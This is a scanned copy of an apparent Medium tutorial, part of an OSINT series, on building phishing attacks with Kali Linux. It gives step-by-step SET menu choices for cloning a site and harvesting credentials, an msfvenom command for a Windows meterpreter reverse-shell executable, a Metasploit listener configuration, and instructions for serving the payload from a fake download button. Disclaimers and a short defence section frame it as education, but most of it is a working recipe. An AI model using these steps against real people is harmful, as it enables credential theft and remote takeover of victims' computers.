medium.com
Open in
urlscan Pro
2606:4700:7::a29f:9904
Public Scan
Submitted URL: https://t.co/BdPmoCuS5m
Effective URL: https://medium.com/@ninamaelainine/7-nights-in-the-world-of-osint-with-kali-linux-night-5-1f49d22855ad?source=rss--...
Submission: On September 09 via manual from US — Scanned from US
Effective URL: https://medium.com/@ninamaelainine/7-nights-in-the-world-of-osint-with-kali-linux-night-5-1f49d22855ad?source=rss--...
Submission: On September 09 via manual from US — Scanned from US
Form analysis
0 forms found in the DOMText Content
Open in app Sign up Sign in Write Sign up Sign in 7 NIGHTS IN THE WORLD OF OSINT WITH KALI LINUX — NIGHT 5 Nina Maelainine · Follow 5 min read · Just now 1 Listen Share NIGHT 5 : A DEEP DIVE INTO PHISHING ATTACKS: EXPLORING KALI LINUX TOOLS FOR ETHICAL HACKING I’ve spent a lot of time taking down phishing websites — those shady sites that trick people into giving away personal information. I often track them down (Late nights — as my mornings are usually too busy with my official work…. ) with simple pop-ups or URL redirects, but after seeing how rampant phishing is, I got curious about how these attacks are actually made. What tools are used? How do attackers mimic legitimate websites so convincingly? Today, we’ll dive into that process using Kali Linux.. TO BE CLEAR, THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. PHISHING IS ILLEGAL, UNETHICAL, AND HARMFUL. WE’RE HERE TO LEARN HOW PHISHING ATTACKS WORK TO BETTER UNDERSTAND HOW WE CAN PROTECT OURSELVES AND OTHERS FROM FALLING VICTIM TO THEM. CREATING A PHISHING ATTACK WITHOUT PERMISSION OR FOR MALICIOUS INTENT IS ILLEGAL AND PUNISHABLE BY LAW. THIS ARTICLE IS ABOUT KNOWLEDGE AND ETHICAL HACKING. STAY ETHICAL! Now, let’s get into it and see how attackers craft phishing sites. We’ll use two well-known tools from the Kali Linux arsenal: the Social Engineering Toolkit (SET) and MSFVenom for payload creation. These tools are designed for testing security and helping organizations safeguard against phishing threats. Let’s explore how to create a mock phishing site — purely for educational testing. Understanding the Tools: SET and MSFVenom Before we jump into the actual steps, let’s break down what these tools do: 1. Social Engineering Toolkit (SET): SET is an open-source framework designed specifically for simulating social engineering attacks. It allows ethical hackers to create phishing websites, conduct spear-phishing campaigns, and even craft payloads to exploit vulnerabilities. 2.MSFVenom: This tool is part of the Metasploit Framework and is used to generate malicious payloads — programs that can execute remote code, open reverse shells, or escalate privileges when run on a victim’s machine. The combination of these two tools can be lethal in the wrong hands, but in the context of ethical hacking, they are invaluable for demonstrating how phishing attacks work and for training security professionals. STEP 1: LAUNCHING THE SOCIAL ENGINEERING TOOLKIT (SET) We’ll begin by setting up our phishing website using SET. This tool makes it incredibly easy to clone a website and capture user credentials. 1. Launch SET: On Kali Linux, open the terminal and type sudo setoolkit. It will require root privileges to run, so you’ll need to enter your password. 2. Website Attack Vectors: Choose the “Website Attack Vectors” (Option 2). This enables you to clone legitimate websites and harvest credentials entered by unsuspecting users. Credential Harvester Attack Method: In the next menu, select “Credential Harvester Attack Method ” (Option 3). This method is key to capturing usernames and passwords that are entered on the fake site. STEP 2: CLONING A WEBSITE WITH SET Now, it’s time to use SET’s Site Cloner feature to make a fake version of a legitimate website. 1. Clone the Target Website: Select “Site Cloner” (Option 2) from the Credential Harvester menu. Then, input the URL of the site you want to clone. For educational purposes, make sure it’s a harmless or test website that you have permission to use. 1. Setup on Localhost: Once SET clones the website, it sets up the phishing page on your local machine. You’ll get an address like http://your-local-ip. Any credentials entered here will be logged in your terminal in real-time. 2. Capture Credentials: When the victim inputs their username and password, you’ll see it immediately logged on your terminal. STEP 3: PAYLOAD CREATION WITH MSFVENOM In addition to stealing credentials, attackers can deliver malicious payloads using phishing websites. MSFVenom helps create those payloads, like reverse shells or backdoors. 1. Generate a Payload: Let’s create a Windows reverse shell. Open a new terminal and run: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your-IP> LPORT=4444 -f exe > payload.exe 1. This command generates a Windows executable (payload.exe) that opens a reverse shell back to your machine. 2. Set Up a Listener: You’ll need to set up a listener to receive the reverse shell when the payload is executed. Start Metasploit with msfconsole, then configure it: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST <your-IP> set LPORT 4444 exploit Now, you’re ready to catch the connection when the victim(not the real victim …) executes the malicious file. STEP 4: COMBINING SET AND MSFVENOM FOR AN ETHICAL PHISHING SIMULATION Now, let’s combine SET and MSFVenom to simulate a phishing attack in a controlled environment. 1. Embed the Payload: Add a link to the cloned website that triggers the download of the payload. For example, create a fake “Download Now” button that serves payload.exe generated with MSFVenom. 2. Testing the Attack: Direct a test subject (who has given explicit permission) to visit the cloned website. Once they enter their credentials, SET captures them. If they download and run the payload, you’ll get a reverse shell back to your machine via Metasploit. 3. Real-Time Attack Flow: * The user visits your cloned page. * Their credentials are harvested by SET. * They download and run payload.exe, giving you remote access to their system. This process mirrors how real phishing attacks unfold, but in a safe, ethical environment for learning. STEP 5: STAYING ETHICAL AND LEGAL While it’s fascinating to see how easily phishing attacks can be set up, it’s critical to stay within legal and ethical boundaries. Never perform these actions without explicit permission. Misuse of these tools is illegal and punishable by law. HOW TO DEFEND AGAINST PHISHING ATTACKS Now that we’ve covered how phishing works, let’s talk about defense strategies: 1. User Awareness: Education is the best defense. Train people to recognize phishing attempts, suspicious emails, and fake websites. 2. Two-Factor Authentication (2FA): 2FA adds an additional security layer, making it much harder for attackers to gain access even if credentials are stolen. 3. Email Filters: Strong email filtering systems can help block phishing emails before they even reach users. 4. SSL/TLS Verification: Encourage users to check for HTTPS encryption and valid SSL certificates before entering sensitive information. 5. Regular Phishing Simulations: Many organizations use phishing simulations to raise awareness and measure the effectiveness of their defenses. So, there you have it — unpacking the tricks behind phishing attacks not only helps us shield ourselves but also reminds us why staying on the right side of the ethical line is crucial. Remember, the goal is to learn and protect, not to cause harm. With these new insights, we’re just scratching the surface of OSINT adventures. Join me tomorrow night . Stay sharp and see you then! SIGN UP TO DISCOVER HUMAN STORIES THAT DEEPEN YOUR UNDERSTANDING OF THE WORLD. FREE Distraction-free reading. No ads. Organize your knowledge with lists and highlights. Tell your story. Find your audience. Sign up for free MEMBERSHIP Read member-only stories Support writers you read most Earn money for your writing Listen to audio narrations Read offline with the Medium app Try for $5/month Kali Linux Phishing Osint Investigation Osint 1 1 Follow WRITTEN BY NINA MAELAININE 164 Followers OSINT pro | Uncovering digital insights and trends Follow MORE FROM NINA MAELAININE Nina Maelainine in OSINT Team 10 ESSENTIAL OSINT NEWSLETTERS YOU SHOULD SUBSCRIBE TO TODAY IF YOU’RE LOOKING TO STAY AHEAD IN THE WORLD OF OSINT , SUBSCRIBING TO THE RIGHT NEWSLETTERS CAN MAKE ALL THE DIFFERENCE. I’VE PERSONALLY… Aug 21 186 1 Nina Maelainine SECRET FILES EXPOSED: HOW TO FIND HIDDEN DOCUMENTS ON THE WEB Aug 23 11 1 Nina Maelainine in OSINT Team 10 ESSENTIAL OSINT CTF CHALLENGES FOR EVERY INVESTIGATOR Aug 15 69 Nina Maelainine DEEP DIVE INTO DISCORD: OSINT TECHNIQUES AS SOMEONE WHO’S SPENT A LOT OF TIME ON DISCORD, I CAN TELL YOU THAT IT’S MUCH MORE THAN JUST A CHAT APP FOR GAMERS. DISCORD IS A DYNAMIC… Aug 28 47 See all from Nina Maelainine RECOMMENDED FROM MEDIUM Vijay Gupta SHODAN: THE MOST DANGEROUS SEARCH ENGINE INTRODUCTION Aug 23 11 Aardvark Infinity in Aardvark Infinity 🦀 RUST-POWERED NETWORK TRAFFIC ANALYSIS: THE FUTURE OF HIGH-PERFORMANCE PROGRAMMING WHEN THE SPEED OF LIGHT DEFINES THE BOUNDARIES OF YOUR WORLD, ONLY THE SHARPEST TOOLS IN THE PROGRAMMING ARSENAL WILL SUFFICE. ENTER RUST —… 4d ago LISTS MEDIUM'S HUGE LIST OF PUBLICATIONS ACCEPTING SUBMISSIONS 334 stories·3473 saves Cyber Sam 25 OSINT TOOLS YOU SHOULD BE USING A LIST OF 25 OF MY FAVOURITE TOOLS FOR MY 100TH MEDIUM ARTICLE Apr 14 128 Khaleel Khan in T3CH UNLOCK HIDDEN SECRETS: HOW THIS TOOL REVEALS EVERYTHING ABOUT ANY PHONE NUMBER! DEEP-HLR: AN ESSENTIAL TOOL FOR FRAUD PREVENTION AND OSINT INVESTIGATIONS Aug 22 207 2 Jonathan Mondaut HOW CHATGPT TURNED ME INTO A HACKER DISCOVER HOW CHATGPT HELPED ME BECOME A HACKER, FROM GATHERING RESOURCES TO TACKLING CTF CHALLENGES, ALL WITH THE POWER OF AI. Jun 18 1K 35 Vijay Gupta MASTERING OSINT: HOW TO FIND INFORMATION ON ANYONE IN THE DIGITAL AGE, INFORMATION IS POWER, AND THE ABILITY TO FIND INFORMATION ON ANYONE IS AN INCREASINGLY VALUABLE SKILL. WHETHER YOU’RE A… 5d ago 2 See more recommendations Help Status About Careers Press Blog Privacy Terms Text to speech Teams